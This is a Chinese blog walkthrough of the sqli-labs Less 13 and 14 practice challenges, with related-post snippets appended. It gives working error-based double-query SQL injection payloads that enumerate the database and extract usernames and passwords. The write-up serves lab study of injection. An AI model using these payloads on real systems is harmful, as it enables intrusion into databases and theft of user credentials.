Less 13-14(双注入查询)

最新推荐文章于 2024-05-17 07:47:17 发布
最新推荐文章于 2024-05-17 07:47:17 发布
阅读量264 收藏 1
点赞数
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/105367667
版权

文章目录

1. 题目分析

开始,我们发现无论输入什么,网站没有报错信息返回。我们使用普通的基于报错返回的注入语句是无效的。那么双注入就会在我们的脑中一闪而过。

首先判断字段类型,以及检索字段个数。
通过多次尝试:
') or 1=1#
在这里插入图片描述
在这里插入图片描述
发现,字段由')闭合。
然后判断检索字段的个数:
') or 1=1 order by 2#
在这里插入图片描述
在这里插入图片描述
由此可知,检索字段的个数为2。

2. 双注入爆库

之前学习过双注入的内容。正好现在来复习一下。
几个关键语法:floor(rand(0)*2), group by, count(*)

  1. 查当前使用的数据库名字
    ') union select count(*), concat(database(), "--", floor(rand(0)*2)) as x from information_schema.tables group by x #
    在这里插入图片描述
    得知当前使用的数据库名为 security

  2. 获知当前数据库下有哪些数据表
    ') union select count(*), concat((select group_concat(table_name) from information_schema.tables where table_schema="security"), "--", floor(rand(0)*2)) as x from information_schema.tables group by x #

    在这里插入图片描述
    由此得知,security数据库下有4张数据表。分别是emails, referers, uagents, users

  3. 爆破users
    接着,我们就查users表中,所有的用户信息。
    首先要知道users表下有哪些字段。
    ') union select count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"), "--", floor(rand(0)*2)) as x from information_schema.tables group by x #
    在这里插入图片描述
    由此得知,users表下有3个字段。id, username, password
    那么下面就是爆破字段的值了。
    ') union select count(*), concat((select concat(username, "::::::",password) from users limit 0,1), "--", floor(rand(0)*2)) as x from information_schema.tables group by x #
    在这里插入图片描述
    这里我们查到了一个用户的信息。账号和密码都是Dumb。我们登录一下看看是否能成功。
    在这里插入图片描述
    可以看到成功了。那么这次的注入也就收尾了。

3. less 14

与往常一样,14和13也是一致的考察。只不过14的闭合方式为"双引号闭合。
给出最后爆破字段值的结果。
" union select count(*), concat((select concat(username, "::::::",password) from users limit 1,1), "--", floor(rand(0)*2)) as x from information_schema.tables group by x #
在这里插入图片描述

老司机开代码
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs学习笔记(四)less 11-14 post注入
闵行小鱼塘
09-07 511
继续学习sqli-labs,本篇是less11-14
LESS-13
qq_44598397的博客
03-21 378
LESS-13 源码: 输入:admin’,出现错误提示,可以知道sql注入中是用’)闭合。 输入:admin’)# 因为这里有报错,所以可以用报错注入 admin’) and extractvalue(1,concat(0x7E,(select database()),0x7E))# 布尔注入: admin’) and left(database(),1)>‘a’#(可以用二分法进...
SQLi LABS Less-13 报错注入+布尔盲注_ sqli less-13 (1)
最新发布
2401_84265909的博客
05-17 919
登录成功时,会提示成功(写死的图片);截取当前使用数据库名字的第一个字符,为了方便脚本的编写,这里将字符转换为ASCLL再判断。页面显示数据库的报错信息,从报错信息中判断出,注入点为:单引号+括号的字符型注入。猜中第一个字符以后,再用此方法枚举其余字符,为了提高效率,稍后使用脚本自动化枚举。接下来使用穷举法,枚举该字符的所有可能性(对应的ASCLL码为:32~126)。从1开始递增测试的长度,可判断出具体的长度,稍后使用脚本自动化猜解。字符的ASCLL码肯定大于1,页面正常显示,表示payload可用。
【sqli-labs】 less14 POST - Double Injection - Single quotes- String -twist (POST型单引号变形注入)...
ajxi63204的博客
01-23 101
名字和less13一样? 看了下源码对比 less13 less14 less14应该是引号吧 出错 构造永真登陆 转载于:https://www.cnblogs.com/omnis/p/8337503.html...
sqli-labs-less-14 post传参+报错注入
yzcn
11-12 181
less-14 post+报错注入 使用burp suite抓包,分析报文体 使用harkbar插件中的post data进行注入: 尝试注入,判断闭合方式: uname=" or 1=1 #&passwd=&submit=Submit 成功登录,说明闭合方式为”” 添加一个)测试是否会报错: uname=") or 1=1 #&passwd=&submit=Submit 出现错误回显. 说明有报错信息回显,我们可以采用报错注入: 获取当前数据库: uname=" u
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 273
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
第六节 GET报错注入-01
09-15
在Less-6的例子中,攻击者依然可以获取数据库名,但利用的是引号而非单引号来构造查询。这里的技巧在于正确地使用字符转义和SQL函数,以避免被系统过滤,并触发报错。 最后,Sqlmap是一个强大的自动化SQL注入工具...
angular-less-bem-test:角阱+较少+ BEM
05-24
5. 依赖注入:通过依赖注入,Angular能轻松管理和共享服务。 【Less】 Less是CSS预处理器,它扩展了CSS的功能,如变量、嵌套规则、运算符等。使用Less可以提高CSS的可读性和可维护性。关键特性包括: 1. 变量:...
第八节 Mysql POST基于错误注入-01
09-15
POST基于错误引号注入是另一种常见的攻击技术。攻击者可以通过在POST请求中inject 引号来触发SQL错误,从而获取数据库信息。在课程中,我们使用Sqli-Lab Less 12作为示例,演示如何使用Burpsuite来截断HTTP请求...
第十八节 绕过去除注释符的SQL注入-01
09-15
在SQL注入攻击中,注释符起到闭合单引号、多单引号、引号、单括号、多括号的功能。但是,如果攻击者想要绕过注释符的限制,可以使用OR '1'='1闭合单引号等。例如: `...
sqli-labs/Less-13
m0_71299382的博客
11-18 276
sqli-labs第十三关
sqli-labs (less-13)
kukudeshuo的博客
03-09 937
sqli-labs (less-13) 进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了 输入 uname=admin'&passwd=admin&submit=Submit #页面回显错误信息 通过报错信息我们知道闭合方式为’),并且为字符型注入 因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击 Boolean盲注 查看当前数据库
Less-13,14(报错注入
m0_62094846的博客
03-30 175
uname=1')#&passwd=1&submit=Submit 正确的不会有显示,错误的会报错 报错注入
SQLi-LABS Less-13&&Less-14
m0_64898960的博客
04-21 256
Less-13题目 通过bp抓包修改进行测试,得知这次需要使用 ') 来闭合 尝试获取显示位失败 尝试报错注入,成功回显 查表 查列 查列里面的内容 Less-14题目 Less-14和Less-13一样,只不过还是在闭合的地方弄了点小手脚而已 所以这里新用一个姿势来进行注入 查表 查列 查列里面的内容 总结 floor报错注入套路 1" union select count(*),concat(database(),floor(rand(0)*2))x from informat
less14~less-17
qq_44598397的博客
03-26 288
LESS-14 输入:admin” 由此可见这个有错误提示且为引号闭合; 由于有报错提醒故可用报错注入: admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))# Admin” and extractvalue(1,concat(0x7e,(select table_name from information_schem...
sqli-labs:less-13/14
Zeker62的博客
08-31 170
less-13和less-14差不多,我们以13为例子 和less-12一样,是一个登录界面: 按照less-12的方法: 进行测试,发现报错,那这里很可能我们注入的字符错误: 我们对passwd进行测试: 发现有个括号没有闭合,那么就可能是('')的组合 在admin里面注入') 过了。那么这个题和12题的区别就是闭合不同咯: 看14题: 现在就可以使用updatexml或者extractva...
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13,SQLi-LABS Less 13,SQLiLABS Less13,SQLi Less 13
Sqli-labs之Less-13和Less-14
m0_46315342的博客
06-04 201
                                          &nbs...
less less-loader
02-06
less 是一种 CSS 预处理器,它允许使用变量、函数、嵌套等高级功能来编写 CSS 代码。less-loader 是 Webpack 的一个模块加载器,用于在 Webpack 中使用 less。它可以将 less 文件转换为 CSS 代码并加载到页面中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值